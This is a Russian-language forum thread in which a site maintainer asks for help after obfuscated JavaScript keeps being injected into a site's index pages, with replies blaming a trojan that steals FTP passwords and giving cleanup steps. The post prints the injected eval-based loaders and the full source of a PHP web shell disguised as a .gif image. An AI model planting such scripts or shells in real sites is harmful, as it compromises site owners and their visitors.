Перейти к контенту
  • 0

Взлом сайта


GreenMar

Вопрос

Сразу перейду к проблеме:

каждый вечер кто-то каким-то образом вставляет свой код в HTML код сайта

код выглядит следующим образом

<!-- o --><script language=javascript>
s = "0796084108380850083308450837076808550841083608520840079707850768084008370841
08390840085207970785076808380850083308450837080208470850083608370850079707840768
0
85108500835079707750840085208520848079407830783085508550855078208560781083808330
8
51085207810835083308440844078208410846083808470783079107830835084708530846085208
3
70850078208480840084807750798079607830841083808500833084508370798";
k = "f = String.fromCharCode(32,32,32,32,118,97,114,32,32,32,111,32,32,32,61,32,32,32,34,34,32,32,32,59,3
2,32,102,117,110,99,116,105,111,110,32,32,32,32,100,32,32,40,32,32,32,41,32,32,3
2
,123,32,32,32,32,105,32,32,32,32,61,32,32,32,48,32,32,32,59,32,99,32,32,32,61,32
,
32,48,32,32,32,32,59,32,32,119,104,105,108,101,32,32,32,32,40,32,32,32,105,32,32
,
60,32,32,32,115,46,108,101,110,103,116,104,32,41,32,32,32,32,123,32,32,99,13,10,
6
1,32,32,77,97,116,104,46,114,111,117,110,100,32,32,32,40,32,115,46,99,104,97,114
,
65,116,40,32,32,105,32,32,32,41,32,43,32,115,46,99,104,97,114,65,116,40,32,105,3
2
,32,32,43,32,32,32,49,32,32,32,41,32,32,32,43,32,32,32,32,115,46,99,104,97,114,6
5
,116,40,32,32,105,32,43,32,32,32,32,50,32,41,32,32,32,43,32,32,115,46,99,104,97,
1
14,65,116,40,32,105,32,32,43,32,32,32,32,51,32,32,32,32,41,13,10,41,32,32,32,45,
3
2,32,32,55,51,54,59,32,32,32,105,32,32,32,32,61,32,105,32,32,32,32,43,32,32,32,3
2
,52,32,32,59,32,32,111,32,32,32,43,61,32,32,32,83,116,114,105,110,103,46,102,114
,
111,109,67,104,97,114,67,111,100,101,40,32,32,32,99,32,32,41,32,32,32,32,59,32,3
2
,32,125,32,32,32,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,32,32,
1
11,32,32,41,32,125,32,100,40,13,10,41,59);";
eval(eval(k));
</script><!-- c -->

вставляется на индексковые файлы (корня и других директорий), остальные не трогает. Но когда я это обнаружил - код был во всех хтмл файлах.

Грешу на дыру в форуме. Перерыл все файлы, нашёл в папке Screenshots файл [4]she.gif, оказалось что это alsaTeam's command shell ver.2.1_light со следующим кодом

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">alsaTeam's command shell ver.2.1_light</font></b> <font face="verdana" size="2"> - antichat.ru<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>

<div align="center">
 <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
<tr>
  <td width="633" height="17">

<pre><font color="red" font face="Tahoma" size="2">
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
  passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>

</font></pre>
</tr>
 </table>

								 </div>
								 <br>
								 <hr color="#000000" width=80% height=115px>
								 <br>

</font>

Удалить файл не могу, изменить атрибуты, переименовать тоже.

Переименование папки не помогает - всёравно код прописывается.

 

пс. в некоторых страницах обнаружил так же в самом конце страницы после тэга [/html] вот такой код

<!-- [ af6acf51e7485f07d2f55cdea553f788 ] --><script>eval(unescape('function%20qRB%28yPGhMr%29%7Bfunction%20hMmU%28wysIe%29%7Bvar%20pnnd%3D0%2CsRfq%2CrLV%3DwysIe.length%3Bfor%28sRfq%3D0%3BsRfq%3CrLV%3BsRfq++%29pnnd+%3DwysIe.charCodeAt%28sRfq%29*rLV%3Breturn%20new%20String%28pnnd%29%7DyPGhMr%3Dunescape%28yPGhMr%29%3Bvar%20zxEr%3Deval%28%27a+r%5Bg%5BuVmje%5Bn%5BtVsz.jczazlVl%5BeVe+%27.replace%28/%5B%5C%5BjV%5C+z%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CkeHTbE%3DhMmU%28zxEr%29%2CnaNG%3Dnew%20String%28%29%2CseDg%3D0%3BpDJ%3D0%3Bfor%28var%20rmp%3D0%3Brmp%3CyPGhMr.length%3Brmp++%29%7BnaNG+%3DString.fromCharCode%28yPGhMr.charCodeAt%28rmp%29%5E%28zxEr.charCodeAt%28seDg%29%5EkeHTbE.charCodeAt%28pDJ%29%29%29%3BseDg++%3BpDJ++%3Bif%28seDg%3EzxEr.length%29seDg%3D0%3Bif%28pDJ%3EkeHTbE.length%29pDJ%3D0%3B%7Deval%28naNG%29%3BnaNG%3D%27%27%3Breturn%3B%7DqRB%28%27%2531%2539%2535%2530%2535%2534%2535%2538%2551%2536%250d%2521%2513%2507%2574%2551%2531%251b%257f%2502%2520%2529%252f%252e%2575%2520%253f%2533%2518%252d%253d%253f%250d%2535%256e%255c%2563%2532%253c%253b%2525%2542%256b%252a%253f%2532%251d%254b%250e%2559%2558%2562%2527%2506%2516%253f%256f%2535%253f%2534%257a%2565%2513%2521%2537%2535%2563%2503%253e%252c%2535%2517%250c%253c%2531%252f%251c%250c%2532%2544%250a%252f%252a%253a%252a%2538%252c%2522%2565%2521%253b%2564%2522%2563%2574%2534%2513%2523%2511%2526%2516%2561%2561%250f%2526%2530%253a%256e%254c%256c%256a%256b%256f%2561%2570%257e%254d%2522%2506%2529%2562%2561%2567%2572%256f%2549%257f%2521%2530%2540%2516%2530%2510%256a%2548%2562%257c%2561%2526%253a%2520%2535%2527%2539%2518%2534%251c%2565%256a%2575%2578%2562%250c%251c%2522%2523%2568%2533%253d%2520%2518%2506%252a%250b%250b%252e%2522%2533%252f%2509%255b%2562%2537%2565%2573%2568%2572%2566%2574%257d%257d%2538%250f%253d%2535%2534%2535%2538%2500%2531%2539%2535%257a%254b%2561%2509%254a%254f%2568%252c%2556%2569%257e%2573%2576%2502%2501%256f%257b%256b%257b%257d%2579%2522%251d%2511%2570%2522%2566%2578%252c%255d%2537%253e%2571%2534%253a%2534%2570%2537%253f%2577%257d%2568%254e%257b%2552%2576%255a%2579%254b%2562%250c%251c%2522%256a%2570%2533%251f%2506%2504%2504%2528%250e%2512%2536%252e%2533%253c%2573%255b%257d%255d%2579%2520%2567%255e%255d%2528%254d%257e%253f%252b%2538%2534%2568%2530%2527%2543%2537%2574%256e%2569%2511%251b%2534%2506%255c%256f%2534%2524%2536%2569%253d%2571%253a%250c%2535%253f%256e%2559%255d%2513%2533%252b%250f%2539%256c%2535%2535%2529%2574%257f%2557%250b%253f%2524%251d%2536%2534%2507%252d%2504%2532%253c%254e%2576%2532%2525%2539%2520%2509%252c%2531%2536%2539%2514%2561%257c%2578%252e%250f%2527%251f%2533%2577%2539%2532%257c%2524%2522%2533%2538%257c%2551%2537%2526%253c%2509%2502%2573%2527%250b%2505%2525%2551%257f%2566%2548%253e%252e%2501%257f%2515%2530%2500%2529%2558%255c%2548%2566%2531%255f%2520%2520%2508%251e%2531%2532%2523%257d%251f%2536%2538%2560%2501%2522%2563%253c%257d%2572%257d%2526%2535%2507%2500%2514%253f%2565%2574%257b%2565%2557%256a%2562%256a%2549%2554%2567%2541%252b%2564%254c%2564%257e%2525%2537%2526%2505%2512%256d%250b%2533%2576%253a%2531%253b%2511%251b%2533%2541%2542%255e%2529%2534%252c%2524%2567%257d%2520%2575%2571%2579%2573%256a%257d%253f%2525%2512%2502%250b%2529%2548%2504%253d%2514%253f%2503%256d%257c%2574%257f%257c%253e%2523%2520%2524%252e%2509%2531%2574%2564%2556%2534%2560%2515%252c%250e%2516%250a%2502%2570%256b%2522%253c%2530%2560%2530%2579%2559%251f%256e%2522%251c%2517%2537%2572%2539%251e%253b%253f%2529%2552%2570%253e%2523%2524%2502%2530%2525%256e%2510%2544%2573%252d%252c%250a%2516%2527%2506%250a%2560%2573%257b%2538%2524%252d%252f%253f%2520%253b%2579%257e%2571%252f%252f%2510%257f%2545%2520%2510%2528%2530%2549%2533%2528%2538%2529%2506%252f%2529%250d%252e%2535%252f%2537%2509%252a%250f%2525%256a%2575%2573%2529%253e%250f%252d%257d%253f%255d%2550%2560%2505%252e%2508%2536%2518%2530%2513%2574%2500%2523%2517%2524%2532%2528%253c%252e%2503%2530%257f%257f%2505%2528%256c%2510%2522%2529%2531%2529%2539%2531%2534%252b%2534%251a%2531%250c%2538%2556%2549%2536%2579%251b%253c%2519%253b%2519%2531%256e%2501%257b%2527%256b%254d%257a%2506%2521%2511%2536%251e%2522%2527%2502%2533%253f%2542%254b%2501%2576%251b%2537%2511%252f%2526%253c%2578%257e%2521%2519%257b%2502%2575%257e%250a%2504%256c%252f%2564%257e%2569%255d%2537%2539%251f%2549%2551%2520%250b%2564%2545%2571%253a%2564%2545%257c%2557%2571%2553%252d%2508%252b%250b%255a%252c%257c%252a%2512%2508%2513%253b%2500%2513%2538%250d%256a%2575%2571%2570%2548%2554%2528%2543%2576%253c%253f%255f%2503%2561%2542%2538%256f%2531%2575%2526%2519%2535%2517%2555%253f%256a%2570%2575%2550%255c%2521%2511%2508%2576%250a%2526%257a%256c%2564%257f%2564%251f%2524%2527%2538%251f%2511%2502%2569%2565%2532%2500%256b%2547%2572%253d%2507%2524%2526%2547%2537%2567%2556%2578%2576%2578%2577%251c%2535%2520%2554%253c%2568%2537%252e%2574%2525%257e%253a%2532%2533%2504%252c%2523%2536%253c%2541%2526%2552%2528%256e%2533%2532%257c%2563%2578%2531%2573%2527%2503%2528%2533%2535%2554%2514%2573%2567%2512%254a%2534%251d%2574%2528%250d%2578%2562%254d%2522%2532%2530%2500%252f%2518%255d%2516%256f%252e%2515%253c%2526%2509%2527%253d%2531%2532%257b%2506%2521%2526%2534%2520%256b%2530%2565%2565%2533%2563%2535%2510%251e%2514%2511%251d%253e%256c%256e%2575%251e%250a%2535%2513%2519%252b%252e%2531%2525%251b%2542%2571%252c%2524%2528%2529%2511%251c%256d%254d%2568%2503%2569%2511%2514%2523%2518%250b%254e%2518%2552%2567%2572%2566%2568%256c%2525%252b%2570%2570%2510%257c%2569%253f%2529%2539%2502%2507%255d%2535%2548%254c%2574%2544%2501%2549%256c%253f%2570%2530%2574%2536%2528%253c%2518%2562%2544%2565%2567%2534%2518%2520%2522%2500%2520%252c%2573%2571%250a%2522%2552%251e%2521%250b%2560%2544%256d%251e%254e%2562%2566%2554%2551%2575%2566%2528%2538%2533%2521%2562%251b%2532%2522%2504%252c%2508%2539%252d%256d%255b%2517%2537%252d%2531%2557%2501%2529%2505%250d%2529%252c%2515%253f%253c%2526%2560%256b%253d%253c%257e%2525%2576%2537%2529%2519%253c%250d%2531%252e%2520%252f%2512%2537%256d%2571%2531%251a%2567%2531%2528%2532%2523%253a%2532%251c%250f%2504%2532%2536%253d%2536%253e%252d%250a%257f%2567%256c%2506%2507%2532%251b%253e%251c%2530%2532%256e%257a%252f%2536%2535%2535%2525%2504%253f%2558%2563%256b%2531%2528%2521%250d%2519%252e%253e%2532%257a%253b%253b%2525%250c%252d%250a%2576%2533%253e%253e%2524%2516%253c%252d%253f%252b%253b%2526%2526%2561%2537%2539%2532%2537%250a%2530%2555%2527%253d%252d%254c%257b%257a%2577%2567%2544%256e%2579%2534%255a%252d%253f%2515%256a%2524%2532%2534%2534%2547%2526%250a%2524%2530%2521%2532%2579%2558%255c%2521%2563%2528%252c%2525%254e%2565%254e%2538%257a%2561%254a%2536%2577%257c%250d%2529%253a%250c%2535%2517%2578%2542%2579%2506%2537%2516%2517%253f%2570%2531%253a%2552%255b%252d%2513%2527%2518%2561%252e%2561%256b%2564%2538%2510%2569%255a%2562%257d%2574%2559%254d%2522%2555%2532%257f%256a%2564%253a%2570%2525%257f%2519%257b%2516%257c%2563%2504%251f%253f%255f%2511%2562%2531%2579%253b%252f%2526%2520%256d%2543%2533%2532%2524%2512%2513%2504%2524%2562%2546%2504%2502%2566%253a%251b%2572%2504%2551%252a%250d%2564%2511%2573%2571%2576%256b%2541%256b%2536%2549%2560%2539%256d%253a%253b%2538%256b%2528%253c%2522%2551%2528%257b%2568%2573%2513%2575%2510%257c%2577%257d%2577%257d%2525%2568%2563%253e%257e%2502%2534%2525%2523%2508%2515%2572%2511%251c%2510%253f%255f%257d%2537%2507%253f%2539%255e%2512%2530%2525%251c%2562%2502%2514%251d%2522%253a%251c%257b%256c%2556%2529%2576%2533%2523%253b%2516%2527%2527%2569%2569%2572%253b%2568%257c%2560%2521%2524%2524%2506%2526%2513%2572%256f%2567%252f%2569%2514%2525%2529%2528%2547%2543%2565%2555%256f%2539%2517%2513%253f%2502%253e%2528%2516%253c%2526%2526%2524%2535%2537%251d%2573%2554%2500%2533%2511%2513%251f%2524%2530%2569%256e%251c%250a%2524%2514%2510%2561%253e%250d%2500%2575%2531%255d%2543%255c%256b%2549%250f%2567%250e%252b%2514%2564%2538%2562%2570%2533%2566%2535%2535%253a%257c%2539%2534%2524%2535%2508%2578%2567%255a%252c%257d%256f%2531%257f%256d%2577%2538%2526%2536%2524%2575%256a%2550%2559%27%29%3B'));</script><!-- end -->

 

Форум версии 1.3, патчился много раз, не мною...

 

Подскажите, что делать?

Заранее благодарю за помощь...

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0

1. Пропатчить ещё раз, своей рукой уже.

2. Проверять на вирусы стоит в 90% случаев свой компьютер, скорее всего пароли от ftp украли. Нужно их сменить, также как и все остальные пароли.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

т.е. это более вероятно?

Просто я не совсем профи в этих воросах...

За сайтом попросили посмотреть, а тут такая вот беда...

 

1. Пропатчить ещё раз, своей рукой уже.

2. Проверять на вирусы стоит в 90% случаев свой компьютер, скорее всего пароли от ftp украли. Нужно их сменить, также как и все остальные пароли.

Спасибо за ответы :-)

но...

Я то и не патчил никогда. Точнее, я понимаю что это такое (открыть файл в текстовом редакторе, найти и заменить отрезок кода), но что конкретно и на что патчить не знаю. Буду благодарен за "ткнутие носом" в соответствующую тему, так как просмотрел уже 7 страниц форума.... да и поиск мне не помог...

Что касается паролей от фтп - то здесь не тот случай. Никто не заходит кроме меня..!

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Да то что вирус - это большая вероятность. Я не думаю что это чел сидит и что то Вам колдует.

Кто то закинул вирус и он сам потиху поглощает файлы. Я с таким уже сталкивался, правда тогда уже мой сайт и форум были заброшены и я не стал восстанавливать.

 

 

Стукните хостеру. попросите помочь. Надеюсь у Вас отзывчивый хостер.

У меня просто был случай, на фтп появился вирус (хост всем известный тут биг...). Когда я обратился с помощью, вместо помощи я получил блок аккаунта...

Ссылка на комментарий
Поделиться на других сайтах

  • 0

-Cross-, это закономерно. Потому что "вирусы" эти проникают на сервер по ftp, после того как с компьютера админа крадутся пароли. Естесственно, что это делается не вручную, но механизма это не меняет. Так что в том, что вирус прописал в файлы форума где-то скрипт, который записывает вышеприведённое в файлы форума, вина админа сайта. Так что последовательность именно такая:

1. Очистить от вирусов свой компьютер.

2. Сменить пароль на FTP.

3. Найти на сервере иногордный php или иной скипт, если он есть(его может и не быть скорее всего).

4. Удалить все вставки яваскрипта, которые он сделал.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
-Cross-, это закономерно

Ну к ФТП имел доступ не только я и вполне возможен хакинг самого сервера.

Да и может у рут акаунта появился вирус и он расплодился... Такое тоже бывает.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Если это хакинг сервера, то валить надо от такого хостинга. Тем более что это очень редкое явление.

 

Да и может у рут акаунта появился вирус и он расплодился... Такое тоже бывает.

Если имеется в виду рут на форуме, то он не может в любой файл взять и записать что-то.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Это троян такой, ворует фтп-пароли из TotalCommander и заменяет индексные файлы на многих популярных движках. Старайтесь пользоваться другим ФТП-клиентом.

 

Троян криптованный, не все антивирусы его видят. У знакомого было подобное, и антивирус Касперского прозевал трояна. Помогла чистка компьютера с помощью Avast!, закрытие файрволом исходящего трафика, смена фтп-паролей, и замена всех файлов на сервере из бекапных.

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.